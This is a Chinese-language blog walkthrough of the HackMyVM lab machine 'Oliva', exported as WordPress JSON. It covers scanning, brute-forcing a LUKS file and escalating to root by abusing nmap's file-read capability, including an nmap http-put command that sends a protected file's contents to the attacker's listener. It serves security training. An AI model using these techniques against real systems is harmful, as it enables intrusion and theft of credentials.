{"id":598,"date":"2024-04-21T17:16:28","date_gmt":"2024-04-21T09:16:28","guid":{"rendered":"http:\/\/162.14.82.114\/?p=598"},"modified":"2024-04-21T17:16:28","modified_gmt":"2024-04-21T09:16:28","slug":"hmv-_-oliva","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/598\/04\/21\/2024\/","title":{"rendered":"hmv[-_-]Oliva"},"content":{"rendered":"<h1>Oliva<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211715599.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211715599.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421153802801\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211715601.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211715601.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421154000423\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 192.168.0.104 -- -A\n\nOpen 192.168.0.104:80\nOpen 192.168.0.104:22\n\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 9.2p1 Debian 2 (protocol 2.0)\n| ssh-hostkey: \n|   256 6d:84:71:14:03:7d:7e:c8:6f:dd:24:92:a8:8e:f7:e9 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKq\/kHQkF02bmDYzOAD\/qpiCHDR97iXI1oNT4\/xeNcpIBmtOTI1NEY8dzAmGqpviQswx99Xc1WUXCJG5NUgf8bE=\n|   256 d8:5e:39:87:9e:a1:a6:75:9a:28:78:ce:84:f7:05:7a (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDERBi20HARO1lSqDbLVqQPspJ1HJA1KDXGblcp9T\/cN\n80\/tcp open  http    syn-ack nginx 1.22.1\n| http-methods: \n|_  Supported Methods: GET HEAD\n|_http-title: Welcome to nginx!\n|_http-server-header: nginx\/1.22.1\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Oliva]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.104\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,bak\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.104\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,zip,git,jpg,txt,bak\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.php            (Status: 200) [Size: 69]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211715602.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211715602.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421154201850\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u654f\u611f\u76ee\u5f55<\/h3>\n<pre><code class=\"language-apl\">http:\/\/192.168.0.104\/index.php<\/code><\/pre>\n<pre><code class=\"language-text\">Hi oliva, Here the pass to obtain root: CLICK!<\/code><\/pre>\n<p>\u4e0b\u8f7d\u4e00\u4e0b\u4ed6\u7ed9\u7684\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Oliva]\n\u2514\u2500$ wget http:\/\/192.168.0.104\/oliva                                             \n--2024-04-21 03:43:52--  http:\/\/192.168.0.104\/oliva\nConnecting to 192.168.0.104:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 20000000 (19M) [application\/octet-stream]\nSaving to: \u2018oliva\u2019\n\noliva                                 100%[=========================================================================&gt;]  19.07M  --.-KB\/s    in 0.07s   \n\n2024-04-21 03:43:52 (257 MB\/s) - \u2018oliva\u2019 saved [20000000\/20000000]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Oliva]\n\u2514\u2500$ ls -la\ntotal 19540\ndrwxr-xr-x  2 kali kali     4096 Apr 21 03:43 .\ndrwxr-xr-x 56 kali kali     4096 Apr 21 03:39 ..\n-rw-r--r--  1 kali kali 20000000 Jul  4  2023 oliva\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Oliva]\n\u2514\u2500$ file oliva   \noliva: LUKS encrypted file, ver 2, header size 16384, ID 3, algo sha256, salt 0x14fa423af24634e8..., UUID: 9a391896-2dd5-4f2c-84cf-1ba6e4e0577e, crc 0x6118d2d9b595355f..., at 0x1000 {&quot;keyslots&quot;:{&quot;0&quot;:{&quot;type&quot;:&quot;luks2&quot;,&quot;key_size&quot;:64,&quot;af&quot;:{&quot;type&quot;:&quot;luks1&quot;,&quot;stripes&quot;:4000,&quot;hash&quot;:&quot;sha256&quot;},&quot;area&quot;:{&quot;type&quot;:&quot;raw&quot;,&quot;offse<\/code><\/pre>\n<p>\u67e5\u4e00\u4e0b\u8fd9\u662f\u4e2a\u5565\uff1a<\/p>\n<blockquote>\n<p>LUKS (Linux Unified Key Setup) \u662f\u4e00\u79cd\u7528\u4e8eLinux\u548c\u5176\u4ed6\u7c7bUnix\u64cd\u4f5c\u7cfb\u7edf\u4e2d\u7684\u5168\u76d8\u52a0\u5bc6\u6807\u51c6\u3002\u5b83\u4e3a\u5b58\u50a8\u8bbe\u5907\uff08\u5982\u786c\u76d8\u5206\u533a\u3001\u56fa\u6001\u786c\u76d8\u6216USB\u9a71\u52a8\u5668\uff09\u63d0\u4f9b\u4e86\u900f\u660e\u7684\u3001\u57fa\u4e8e\u5bc6\u7801\u7684\u52a0\u5bc6\u673a\u5236\u3002<\/p>\n<ul>\n<li>\u521d\u59cb\u5316\u52a0\u5bc6\u5206\u533a\uff1a<code>cryptsetup luksFormat \/dev\/device --cipher aes-xts-plain64 --key-size 512 --hash sha512 --iter-time 5000<\/code><\/li>\n<li>\u6253\u5f00\uff08\u5373\u6302\u8f7d\uff09\u52a0\u5bc6\u5206\u533a\uff1a<code>cryptsetup open \/dev\/device myencryptedvolume<\/code><\/li>\n<li>\u5728\u6253\u5f00\u7684\u52a0\u5bc6\u8bbe\u5907\u4e0a\u521b\u5efa\u5e76\u683c\u5f0f\u5316\u6587\u4ef6\u7cfb\u7edf\uff1a<code>mkfs.ext4 \/dev\/mapper\/myencryptedvolume<\/code><\/li>\n<li>\u6302\u8f7d\u6587\u4ef6\u7cfb\u7edf\u4f9b\u6b63\u5e38\u4f7f\u7528\uff1a<code>mount \/dev\/mapper\/myencryptedvolume \/mnt\/secure<\/code><\/li>\n<li>\u5173\u95ed\uff08\u5373\u5378\u8f7d\uff09\u52a0\u5bc6\u5206\u533a\uff1a<code>cryptsetup close myencryptedvolume<\/code><\/li>\n<\/ul>\n<\/blockquote>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211715603.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211715603.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421154837770\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u7206\u7834LUKS<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Oliva]\n\u2514\u2500$ chmod +x oliva        \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Oliva]\n\u2514\u2500$ bruteforce-luks -t 4 -f \/usr\/share\/wordlists\/rockyou.txt -v 10 oliva\nWarning: using dictionary mode, ignoring options -b, -e, -l, -m and -s.\n\nTried passwords: 0\nTried passwords per second: 0.000000\nLast tried password: password\n\n^C<\/code><\/pre>\n<p>\u554a\u8fd9\u3002\u3002\u3002\u3002<\/p>\n<p>\u6211\u76f4\u63a5\u770b\u522b\u4eba\u7684wp\u4e86\uff0c\u8fd9\u4e2a\u53ef\u80fd\u662f\u6211\u8fd9\u8fb9\u7684\u73af\u5883\u914d\u7f6e\u6709\u70b9\u95ee\u9898\uff1a<\/p>\n<pre><code class=\"language-text\">Password found: bebita<\/code><\/pre>\n<p>\u7136\u540e\u6253\u5f00\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-bash\">cryptsetup luksOpen oliva temp\nbebita\ncd \/dev\/mapper\/\nls -la\nmount \/dev\/mapper\/temp \/mnt\ncd \/mnt\ncat mypass.txt\n# Yesthatsmypass!<\/code><\/pre>\n<h3>ssh\u8fde\u63a5<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211715604.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211715604.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421170159924\" style=\"zoom:67%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">oliva@oliva:~$ ls -la\ntotal 32\ndrwx------ 3 oliva oliva 4096 jul  4  2023 .\ndrwxr-xr-x 3 root  root  4096 jul  4  2023 ..\nlrwxrwxrwx 1 oliva oliva    9 jul  4  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 oliva oliva  220 jul  4  2023 .bash_logout\n-rw-r--r-- 1 oliva oliva 3526 jul  4  2023 .bashrc\ndrwxr-xr-x 3 oliva oliva 4096 jul  4  2023 .local\n-rw-r--r-- 1 oliva oliva  807 jul  4  2023 .profile\n-rw------- 1 oliva oliva   24 jul  4  2023 user.txt\n-rw------- 1 oliva oliva  102 jul  4  2023 .Xauthority\noliva@oliva:~$ cat user.txt \nHMVY0H8NgGJqbFzbgo0VMRm\noliva@oliva:~$ sudo -l\n-bash: sudo: orden no encontrada\noliva@oliva:~$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/bin\/newgrp\n\/usr\/bin\/umount\n\/usr\/bin\/chfn\n\/usr\/bin\/passwd\n\/usr\/bin\/mount\n\/usr\/bin\/su\n\/usr\/bin\/chsh\n\/usr\/bin\/gpasswd\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\noliva@oliva:~$ \/usr\/sbin\/getcap \/ 2&gt;\/dev\/null\noliva@oliva:~$ \/usr\/sbin\/getcap -r \/ 2&gt;\/dev\/null\n\/usr\/bin\/nmap cap_dac_read_search=eip\n\/usr\/bin\/ping cap_net_raw=ep<\/code><\/pre>\n<h3>nmap\u8bfb\u53d6\u6570\u636e\u5e93\u5bc6\u7801<\/h3>\n<p>nmap\u9614\u4ee5\u8bfb\u53d6\u6587\u4ef6\u3002<\/p>\n<p>\u53c2\u8003\u4e00\u4e0b\uff1a<a href=\"https:\/\/gtfobins.github.io\/gtfobins\/nmap\/#file-upload\">https:\/\/gtfobins.github.io\/gtfobins\/nmap\/#file-upload<\/a><\/p>\n<p>\u7ee7\u7eed\u67e5\u770b\u4e00\u4e0b\u662f\u5426\u5f00\u542f\u4e86\u76f8\u5173\u670d\u52a1\uff1a<\/p>\n<pre><code class=\"language-bash\">oliva@oliva:~$ ss -tnlup\nNetid          State           Recv-Q          Send-Q                   Local Address:Port                   Peer Address:Port         Process          \nudp            UNCONN          0               0                              0.0.0.0:68                          0.0.0.0:*                             \ntcp            LISTEN          0               80                           127.0.0.1:3306                        0.0.0.0:*                             \ntcp            LISTEN          0               511                            0.0.0.0:80                          0.0.0.0:*                             \ntcp            LISTEN          0               128                            0.0.0.0:22                          0.0.0.0:*                             \ntcp            LISTEN          0               511                               [::]:80                             [::]:*                             \ntcp            LISTEN          0               128                               [::]:22                             [::]:*  <\/code><\/pre>\n<p>\u5f00\u542f\u4e86\u6570\u636e\u5e93\u3002<\/p>\n<p>\u4f7f\u7528<code>gtfobins<\/code>\u7684\u65b9\u6848\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ socat -v tcp-listen:8080,reuseaddr,fork -\n2024\/04\/21 05:12:51 socat[19458] E read(6, 0x55c8d32e0000, 8192): Connection reset by peer\n> 2024\/04\/21 05:12:51.000584590  length=331 from=0 to=330\nPUT \/ HTTP\/1.1\\r\nContent-Length: 163\\r\nUser-Agent: Mozilla\/5.0 (compatible; Nmap Scripting Engine; https:\/\/nmap.org\/book\/nse.html)\\r\nConnection: close\\r\nHost: kali:8080\\r\n\\r\nHi oliva,\nHere the pass to obtain root:\n\n&lt;?php\n$dbname = &#039;easy&#039;;\n$dbuser = &#039;root&#039;;\n$dbpass = &#039;Savingmypass&#039;;\n$dbhost = &#039;localhost&#039;;\n?&gt;\n\n&lt;a href=&quot;oliva&quot;&gt;CLICK!&lt;\/a&gt;\nPUT \/ HTTP\/1.1\nContent-Length: 163\nUser-Agent: Mozilla\/5.0 (compatible; Nmap Scripting Engine; https:\/\/nmap.org\/book\/nse.html)\nConnection: close\nHost: kali:8080\n\nHi oliva,\nHere the pass to obtain root:\n\n&lt;?php\n$dbname = &#039;easy&#039;;\n$dbuser = &#039;root&#039;;\n$dbpass = &#039;Savingmypass&#039;;\n$dbhost = &#039;localhost&#039;;\n?&gt;\n\n&lt;a href=&quot;oliva&quot;&gt;CLICK!&lt;\/a&gt;\n^C                <\/code><\/pre>\n<pre><code class=\"language-bash\">oliva@oliva:~$ nmap -p 8080 192.168.0.143 --script http-put --script-args http-put.url=\/,http-put.file=\/var\/www\/html\/index.php\nStarting Nmap 7.93 ( https:\/\/nmap.org ) at 2024-04-21 11:12 CEST\nNmap scan report for kali (192.168.0.143)\nHost is up (0.00091s latency).\n\nPORT     STATE SERVICE\n8080\/tcp open  http-proxy\n|_http-put: ERROR: Script execution failed (use -d to debug)\n\nNmap done: 1 IP address (1 host up) scanned in 4.41 seconds<\/code><\/pre>\n<p>\u6216\u8005\u4f7f\u7528\u4ee5\u4e0b\u65b9\u6848\uff1a<\/p>\n<pre><code class=\"language-bash\">oliva@oliva:~$ cd \/var\/www\/html\noliva@oliva:\/var\/www\/html$ ls -la\ntotal 19548\ndrwxr-xr-x 2 root     root         4096 jul  4  2023 .\ndrwxr-xr-x 3 root     root         4096 jul  4  2023 ..\n-rw-rw---- 1 www-data www-data      615 jul  4  2023 index.html\n-rw-rw---- 1 www-data www-data      163 jul  4  2023 index.php\n-rw-rw---- 1 www-data www-data 20000000 jul  4  2023 oliva\noliva@oliva:\/var\/www\/html$ cat index.php\ncat: index.php: Permiso denegado\noliva@oliva:\/var\/www\/html$ nmap -iL index.php\nStarting Nmap 7.93 ( https:\/\/nmap.org ) at 2024-04-21 11:07 CEST\nFailed to resolve &quot;Hi&quot;.\nFailed to resolve &quot;oliva,&quot;.\nFailed to resolve &quot;Here&quot;.\nFailed to resolve &quot;the&quot;.\nFailed to resolve &quot;pass&quot;.\nFailed to resolve &quot;to&quot;.\nFailed to resolve &quot;obtain&quot;.\nFailed to resolve &quot;root:&quot;.\nFailed to resolve &quot;&lt;?php&quot;.\nFailed to resolve &quot;$dbname&quot;.\nFailed to resolve &quot;=&quot;.\nFailed to resolve &quot;&#039;easy&#039;;&quot;.\nFailed to resolve &quot;$dbuser&quot;.\nFailed to resolve &quot;=&quot;.\nFailed to resolve &quot;&#039;root&#039;;&quot;.\nFailed to resolve &quot;$dbpass&quot;.\nFailed to resolve &quot;=&quot;.\nFailed to resolve &quot;&#039;Savingmypass&#039;;&quot;.\nFailed to resolve &quot;$dbhost&quot;.\nFailed to resolve &quot;=&quot;.\nFailed to resolve &quot;&#039;localhost&#039;;&quot;.\nFailed to resolve &quot;?&gt;&quot;.\nFailed to resolve &quot;&lt;a&quot;.\nUnable to split netmask from target expression: &quot;href=&quot;oliva&quot;&gt;CLICK!&lt;\/a&gt;&quot;\nWARNING: No targets were specified, so 0 hosts scanned.\nNmap done: 0 IP addresses (0 hosts up) scanned in 0.68 seconds<\/code><\/pre>\n<p>\u627e\u5230\u4e86\u6570\u636e\u5e93\u5bc6\u7801\uff01<\/p>\n<pre><code class=\"language-apl\">root\nSavingmypass<\/code><\/pre>\n<h3>\u8bfb\u53d6\u6570\u636e\u5e93\u63d0\u6743<\/h3>\n<p>\u7136\u540e\u8bfb\u53d6\u6570\u636e\u5e93\uff1a<\/p>\n<pre><code class=\"language-bash\">oliva@oliva:~$ mysql -u root -p\nEnter password: \nWelcome to the MariaDB monitor.  Commands end with ; or \\g.\nYour MariaDB connection id is 5\nServer version: 10.11.3-MariaDB-1 Debian 12\n\nCopyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.\n\nType &#039;help;&#039; or &#039;\\h&#039; for help. Type &#039;\\c&#039; to clear the current input statement.\n\nMariaDB [(none)]&gt; show databases;\n+--------------------+\n| Database           |\n+--------------------+\n| easy               |\n| information_schema |\n| mysql              |\n| performance_schema |\n| sys                |\n+--------------------+\n5 rows in set (0,067 sec)\n\nMariaDB [(none)]&gt; use easy;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\n\nDatabase changed\nMariaDB [easy]&gt; show tables;\n+----------------+\n| Tables_in_easy |\n+----------------+\n| logging        |\n+----------------+\n1 row in set (0,000 sec)\n\nMariaDB [easy]&gt; select * from logging;\n+--------+------+--------------+\n| id_log | uzer | pazz         |\n+--------+------+--------------+\n|      1 | root | OhItwasEasy! |\n+--------+------+--------------+\n1 row in set (0,026 sec)\n\nMariaDB [easy]&gt; exit\nBye<\/code><\/pre>\n<p>\u5c1d\u8bd5\u767b\u5f55\uff0c\u53d1\u73b0\u6210\u529f\uff01<\/p>\n<pre><code class=\"language-bash\">oliva@oliva:~$ su root\nContrase\u00f1a: \nroot@oliva:\/home\/oliva# cd \/root\nroot@oliva:~# ls -la\ntotal 32\ndrwx------  4 root root 4096 jul  4  2023 .\ndrwxr-xr-x 18 root root 4096 jul  4  2023 ..\nlrwxrwxrwx  1 root root    9 jul  4  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root  571 abr 10  2021 .bashrc\ndrwxr-xr-x  3 root root 4096 jul  4  2023 .local\n-rw-------  1 root root  567 jul  4  2023 .mysql_history\n-rw-r--r--  1 root root  161 jul  9  2019 .profile\n-rw-------  1 root root   24 jul  4  2023 rutflag.txt\ndrwx------  2 root root 4096 jul  4  2023 .ssh\nroot@oliva:~# cat rutflag.txt \nHMVnuTkm4MwFQNPmMJHRyW7\nroot@oliva:~# cd .ssh\/\nroot@oliva:~\/.ssh# ls -la\ntotal 8\ndrwx------ 2 root root 4096 jul  4  2023 .\ndrwx------ 4 root root 4096 jul  4  2023 ..<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Oliva \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 192.168.0.104 &#8212; -A Open 19 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-598","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/598","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=598"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/598\/revisions"}],"predecessor-version":[{"id":599,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/598\/revisions\/599"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=598"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=598"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=598"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}